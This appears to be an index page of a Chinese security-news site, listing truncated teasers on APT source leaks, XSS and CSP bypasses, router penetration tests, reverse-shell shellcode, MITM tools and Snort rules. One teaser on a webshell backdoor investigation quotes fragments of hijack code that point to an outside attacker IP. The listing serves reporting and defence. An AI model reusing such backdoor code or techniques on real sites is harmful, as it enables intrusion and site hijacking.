疑似俄罗斯黑客团体Fancy Bear使用的攻击程序源码文件

疑似俄罗斯黑客团体Fancy Bear使用的攻击程序源码文件

2周前 (01-11) 浏览: 13 评论: 0

近期,安全研究人员在Github上发现了疑似俄罗斯黑客团体Fancy Bear使用的网络攻击相关源代码程序,这些程序用于攻击端与受害端的通信控制。通过分析发现,黑客使用了Gmail邮箱进行加密信息的接发交流。而据源码分享者表示,这些文件是在黑客的某台C&C中转服务器上发现的。 程序源码Github https://github.com/rickey-g/fancybear 源代码语法信息

进攻即是最好的防御!19个练习黑客技术的在线网站

进攻即是最好的防御!19个练习黑客技术的在线网站

3周前 (01-03) 浏览: 54 评论: 0

进攻即是最好的防御,这句话同样适用于信息安全的世界。这里罗列了19个合法的来练习黑客技术的网站,不管你是一名开发人员、安全工程师、代码审计师、渗透测试人员,通过不断的练习才能让你成为一个优秀安全研究人员。以下网站希望能给各位安全小伙伴带来帮助!若有其他的补充和推荐,欢迎给小编留言(排名不分先后) 国外 1、bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web

黑客可通过行李标签代码轻松“解锁”旅客的航班和身份信息

黑客可通过行李标签代码轻松“解锁”旅客的航班和身份信息

3周前 (01-03) 浏览: 4 评论: 0

订机票是一件很简单的事情,但你的权益保障仍取决于黑客是否要来捣乱。德国“安全研究实验室”的 Karstein Nohl 和 Nemanja Nikodejevic 指出,旅客订票系统多年来一直未得到足够的保护。实际上,全球三大处理航班预定服务的“全球分布式系统”(GDS),可通过多个方面被别有用心的人所滥用。 始建于 70-80 年代的 Amadeus、Sabre、Travelport 三套系统,

对斐讯Fir302B路由器进行的渗透测试

对斐讯Fir302B路由器进行的渗透测试

3周前 (01-03) 浏览: 6 评论: 0

0×00 固件发布站弱口令+sql注入 fir302b的板子还是比较友好的,拆开能直接看到GND TX RX VCC,虽然没有针脚。 我手头只有一块ttl开发板和三根杜邦线,直接连上UART: 自检结束后,能看到两处post请求,把当前的设备指纹信息、终端账号密码、云账号密码发送到了一个地址 这个url是一个固件发布站,后台存在弱口令 在查询工号处存在注入 昨天测试的时候,发现还有个spring框

“微信支付大盗”来袭,有人被盗近万元

“微信支付大盗”来袭,有人被盗近万元

3周前 (01-03) 浏览: 15 评论: 0

近日,猎豹移动安全实验室捕获到一类高度危险的盗取微信支付资金类的手机病毒,多款手机ROM和APP中均捆绑了该病毒。中毒后,微信帐号随即被盗,严重威胁微信支付钱包及微信支付关联的银行卡资金安全,目前已有上千名用户中招。 据某中招用户回述: 前几个月将手机进行了刷机。12月11日,突然弹出一个提示框,显示微信未登录,登陆后就继续玩游戏没管。晚上发现手机已死机,第二天重刷后发现微信被盗。然后直接申诉找回

DNSChanger卷土重来,家用路由器当心了

DNSChanger卷土重来,家用路由器当心了

1个月前 (12-21) 浏览: 40 评论: 0

圣诞节快来了,各类打折活动即将到来,与此同时,新型的恶意软件已经上线。 下图展示研究人员捕获的流量 DNSChanger这个名字,大家或许有所耳闻。这款恶意软件曾在2012年感染了全世界范围内数百万台电脑。 近日,ProofPoint的研究人员发现了升级版的DNSChanger EK(漏洞利用工具包),它利用恶意广告传播。在感染用户设备后,这个漏洞利用套装将修改路由器DNS服务器条目,指向攻击者控

85%的企业认为自己有能力抵御网络攻击,可实际情况是…

85%的企业认为自己有能力抵御网络攻击,可实际情况是…

1个月前 (12-16) 浏览: 18 评论: 0

这两年我们看到企业安全问题已经迫在眉睫,很多安全公司对企业安全是持悲观态度的。但从最近BAE Systems的一个调查来看,似乎绝大部分企业对自家的安全问题都非常乐观。这项调查显示: 85%的企业认为他们为可能面临的网络攻击做好了防御准备。但实际情况是,在过去半年内,这些企业中有40%都遭到了攻击。 BAE Systems的这份调查报告中还提到近期发生的入侵事件,对企业而言造成的平均损失超过50万

浅谈Android开放网络端口的安全风险

浅谈Android开放网络端口的安全风险

2个月前 (12-08) 浏览: 28 评论: 0

0x00 简介 Android应用通常使用PF_UNIX、PF_INET、PF_NETLINK等不同domain的socket来进行本地IPC或者远程网络通信,这些暴露的socket代表了潜在的本地或远程攻击面,历史上也出现过不少利用socket进行拒绝服务、root提权或者远程命令执行的案例。特别是PF_INET类型的网络socket,可以通过网络与Android应用通信,其原本用于linux环

一个支付宝木马的分析溯源之旅

一个支付宝木马的分析溯源之旅

2个月前 (12-08) 浏览: 23 评论: 0

0x00 引子 人在做,天在看。 与网络的黑暗面斗争中,我们看到太多的年轻人陷入黑产的陷井,少数人暴发横财及时收手还能全身而退,多数人身处产业链的底端所得不多却受牢狱之灾。年轻人是国家的未来,他们敢想敢干而又无知鲁莽,希望他们不要为一时的无知付出太大的代价,今天的这个文章可以算作一个警醒,千金不换回头路。 网络从来就是一把双刃剑,越来越便捷的知识传播让广大的网络黑产工作者们只需简单修改别人的代码就

利用反射型XSS二次注入绕过CSP form-action限制

利用反射型XSS二次注入绕过CSP form-action限制

2个月前 (12-07) 浏览: 14 评论: 0

0x01 简单介绍 CSP(Content-Security-Policy)是为了缓解XSS而存在的一种策略, 开发者可以设置一些规则来限制页面可以加载的内容.那文本中所说的form-action又是干啥的呢?用他可以限制form标签"action"属性的指向页面, 这样可以防止攻击者通过XSS修改表单的"action"属性,偷取用户的一些隐私信息. 0x02 实例分析 上面讲的太抽象了, 如果

绕过 Cisco TACACS+ 的三种攻击方式

绕过 Cisco TACACS+ 的三种攻击方式

2个月前 (12-07) 浏览: 29 评论: 0

在这篇文章中,作者介绍了绕过 Cisco 设备的 TACACS 的三种方式。 No.1 利用 DoS 攻击绕过 Cisco TACACS+ No.2 本地爆破 PSK 绕过 Cisco TACACS+ No.3 利用中间人攻击 绕过 Cisco TACACS+ 一般来说,在一个大型网络中会有很多网络设备,如何管理这些网络设备的访问权限可能是个大问题。因此,大多数公司都会实现集中化的权限访问协议。C

一种新的攻击方法——Java-Web-Expression-Language-Injection

一种新的攻击方法——Java-Web-Expression-Language-Injection

2个月前 (12-07) 浏览: 17 评论: 0

Nsfocus-TRC [crayon-588584d86002c522652973/] tags: [Java Web,Expression Language] 0×00 引言 [email protected]: 链接的内容是一个名为Jenkins的服务,可以在没有password的情况下受到攻击。而攻击方法比较有趣,Jenkins提供了一个Script Console功能,

一维条形码攻击技术(Badbarcode)

一维条形码攻击技术(Badbarcode)

2个月前 (11-21) 浏览: 49 评论: 0

0x00 前言 在日常生活中,条形码随处可见,特别在超市,便利店,物流业,但你们扫的条形码真的安全吗?之前TK教主 在PacSec介绍的条形码攻击和twitter上的demo视频太炫酷,所以就自己买了个扫码器自己研究了一下 ,在研究时候也找遍了国内外所有资料,但是都没有对可以执行的攻击技术完整的文章,故有此文分享。 : ) 0x01 条形码介绍 条形码(barcode)是将宽度不等的多个黑条和空白

ES6中的模板字符串和新XSS Payload

ES6中的模板字符串和新XSS Payload

2个月前 (11-17) 浏览: 19 评论: 0

众所周知,在XSS的实战对抗中,由于防守方经常会采用各种各样严格的过滤手段来过滤输入,所以我们使用的XSS Payload也会根据实际情况作出各种各样的调整,最常见的如避免括号,避免引号,避免关键字等,以绕开过滤函数的检查,从而成功将代码注入到网页中运行。 在传统的XSS Payload变形中,常用的无非有以下几种: 1. 使用String.fromCharCode来避免关键字,如String.f

得到内网域管理员的5种常见方法

得到内网域管理员的5种常见方法

2个月前 (11-16) 浏览: 60 评论: 0

spiderlabs总结的,我简单翻译下,偶尔加点我的牢骚。 1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地

中国再次发现来自海外的黑客攻击:蔓灵花攻击行动

中国再次发现来自海外的黑客攻击:蔓灵花攻击行动

2个月前 (11-15) 浏览: 64 评论: 0

近日,360追日团队发布了蔓灵花攻击行动(简报),披露又一个针对中国政府能源的海外黑客攻击,受影响单位主要是涉及政府、电力和工业相关单位,该组织至今依然处于活跃状态。 从这次攻击事件与近期发布的摩诃草、索伦之眼,以及之前的伊朗核电站、乌克兰电网断电等事件,我们看到网络空间的争夺成为了大国博弈的焦点,APT作为一种行之有效的手段不断在各类对抗中出现。随着APT对抗烈度的增加,跨平台的攻击将会成为主流

常见的HTTPS攻击方法

常见的HTTPS攻击方法

2个月前 (11-14) 浏览: 29 评论: 0

0x00 背景 研究常见的https攻击方法 Beast crime breach,并针对https的特性提出一些安全部署https的建议。 针对于HTTPS的攻击,多存在于中间人攻击的环境中,主要是针对于HTTPS所使用的压缩算法和CBC加密模式,进行side-channel-attack。这几类攻击的前置条件都比较苛刻,且都需要受害主机提交很多次请求来收集破译关键数据的足够信息。 常见的攻击方

戳戳HackShield Ring0反調試

戳戳HackShield Ring0反調試

2个月前 (11-10) 浏览: 31 评论: 0

0x00 前言 之前玩遊戲,玩累了想說用Cheat Engine來搞搞遊戲,果然被檢測了,上網找了一下他anti debugger的方式是從Ring0來的,但是大多數都只剩下解法沒有實作,只好自己做做看了 0x01 前置準備 可以跑TMD殼的VM http://forum.gamer.com.tw/Co.php?bsn=07650&sn=4416070 雙機調試 HS本身有對內核調試器檢測

漏扫工具AWVS命令执行

漏扫工具AWVS命令执行

2个月前 (11-10) 浏览: 28 评论: 0

0x00 概述 几个星期前,作者曾发表了关于WINRAR 0DAY(文件名欺骗)的文章。得到了大量人的关注和询问,所以这次又放出一个0day (最热门的漏扫工具 wvs)。作者POC测试版本为: ACUNETIX 8 (build 20120704) 貌似是老外用的非常多版本。作者意图想让攻击者在使用wvs 按下扫描键前三思而后行(这个才是真正的主动防护吧:)。 0x01 漏洞分析 ACUNETI

祸起萧墙:由播放器引爆的全国性大规模挂马分析

祸起萧墙:由播放器引爆的全国性大规模挂马分析

2个月前 (11-09) 浏览: 31 评论: 0

0x00 事件起因 从5月底开始,360云安全系统监测到一个名为“中国插件联盟”的下载者木马感染量暴涨。令人匪夷所思的是,该木马的下载通道竟然是多款用户量上千万甚至过亿的播放器客户端。 起初,我们怀疑这些播放器的升级文件被木马进行了网络劫持。通过对木马下载重灾区搜狐影音的分析,我们发现搜狐影音对网络下载的运行代码做了完整性校验,但并没有对安全性做校验,比如签名信息等,确实可以被劫持升级种木马。不过

利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想

利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想

3个月前 (11-09) 浏览: 18 评论: 0

首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容。 什么是低频?以下就是低频的解释: 低频(LF, Low frequency)是指频带由30KHz到300KHz的无线电电波。一些无线电频率识别( RFID技术 )标签使用低频。 这些标签通常被称为 LFID’s或LowFID’s(低频率识别Low Frequency Identi

更便捷的中间人攻击框架Xerosploit

更便捷的中间人攻击框架Xerosploit

3个月前 (11-07) 浏览: 152 评论: 0

0×00 前言 偶然间,在国外网站的一篇文章中发现有提到这款中间人框架,顺藤摸瓜拿来实践一番,发现确实很可以,确实很方便,不敢独享,特来抛砖引玉,不足之处还望斧正~ 0×01 工具介绍 Xerosploit是一款可以进行中间人攻击的渗透测试工具包。它具有多种模块,可以进行多重有效的攻击,如拒绝服务和端口扫描、劫持等。由bettercap和nmap强力驱动。 0×02 工具安装 [crayon-58

新型DDos攻击:利用LDAP服务器实现攻击放大

新型DDos攻击:利用LDAP服务器实现攻击放大

3个月前 (11-05) 浏览: 70 评论: 0

说到网络安全,你一定会想起前不久的DDoS攻击“Mirai”,导致美国半数的互联网瘫痪,你一定会觉得那很牛掰吧,但其实这并不算什么,要让DDoS攻击力更彪悍,现在有一种新方法了。 LDAP 据Corero网络安全公司披露,上周发现一种新型DDoS攻击媒介针对其客户发起攻击。这种攻击技术是一种利用轻量目录访问协议(Lightweight Directory Access Protocol,LDAP)

如何使用ODROID-C2打造个人专属的渗透测试系统?

如何使用ODROID-C2打造个人专属的渗透测试系统?

3个月前 (11-02) 浏览: 41 评论: 0

在这篇文章中,我将会对比三款单版计算机,并试图从中挑选一款最适合用来搭建渗透测试环境,并且价格大概能在 110 美金左右的单板计算机。但不得不说的是,当我决定做这些测试的时候,事实上已经完全超出了我的预算!如果你想跳过我以下关于 SBC 的对比内容,那么你可以直接到以下地址:点击 阅读有关渗透测试环境的直接搭建过程! 概述 几周前,我接到一个任务,对即将到来的零售组织商做一次评估。为了准备这次评估

中国最大的Webshell后门箱子调查,所有公开大马全军覆没

中国最大的Webshell后门箱子调查,所有公开大马全军覆没

3个月前 (11-02) 浏览: 60 评论: 0

起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s',[email protected]

使用netcat进行反弹链接的shellcode

使用netcat进行反弹链接的shellcode

3个月前 (10-28) 浏览: 24 评论: 0

这篇文章主要是谈,在远程溢出时怎样构造shellcode,才能形成一个有效的反弹链接。 0x00 反向绑定远程shell 让本地主机和远程shell建立起连接的方法有很多种,其中最常见的是在远程主机上开放一个端口,然后把它的 [crayon-588584d865bf6277076264/] 重定向到一个shell上。 这样我们就可以在自己的主机上通过一个简单的netcat命令来连接它。 但是,大多

使用Tor绕过防火墙进行远程匿名访问

使用Tor绕过防火墙进行远程匿名访问

3个月前 (10-28) 浏览: 52 评论: 0

0x00 摘要 在这篇文章中,我将使用一个工具和一组Red Team的技术进行保持匿名性访问受感染的机器。同时,我会提供一些检测后门和应对这类攻击的建议。 这并不是一个全新的理念,但据我所知这些技术还没从渗透测试和Red Team的角度进行深入谈论。至少从2012年开始就有恶意软件的作者使用这些技术。如果他们这么做,我们当然也不能落后。 0x01 动机 那些使用成熟的安全项目的高端用户,每天都在监

SNORT入侵检测系统

SNORT入侵检测系统

3个月前 (10-27) 浏览: 30 评论: 0

0x00 一条简单的规则 alert tcp 202.110.8.1 any -> 122.111.90.8 80 (msg:”Web Access”; sid:1) alert:表示如果此条规则被触发则告警 tcp:协议类型 ip地址:源/目的IP地址 any/80:端口号 ->:方向操作符,还有<>双向。 msg:在告警和包日志中打印消息 sid:Snort规则id …

富文本存储型XSS的模糊测试之道

富文本存储型XSS的模糊测试之道

3个月前 (10-27) 浏览: 15 评论: 0

0x00 背景 凭借乌云漏洞报告平台的公开案例数据,我们足以管中窥豹,跨站脚本漏洞(Cross-site Script)仍是不少企业在业务安全风险排查和修复过程中需要对抗的“大敌”。 XSS可以粗分为反射型XSS和存储型XSS,当然再往下细分还有DOM XSS, mXSS(突变XSS), UXSS(浏览器内的通用跨站脚本)。其中一部分解决方法较为简便,使用htmlspecialchars()对HT

切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

切换登录

注册

扫一扫二维码分享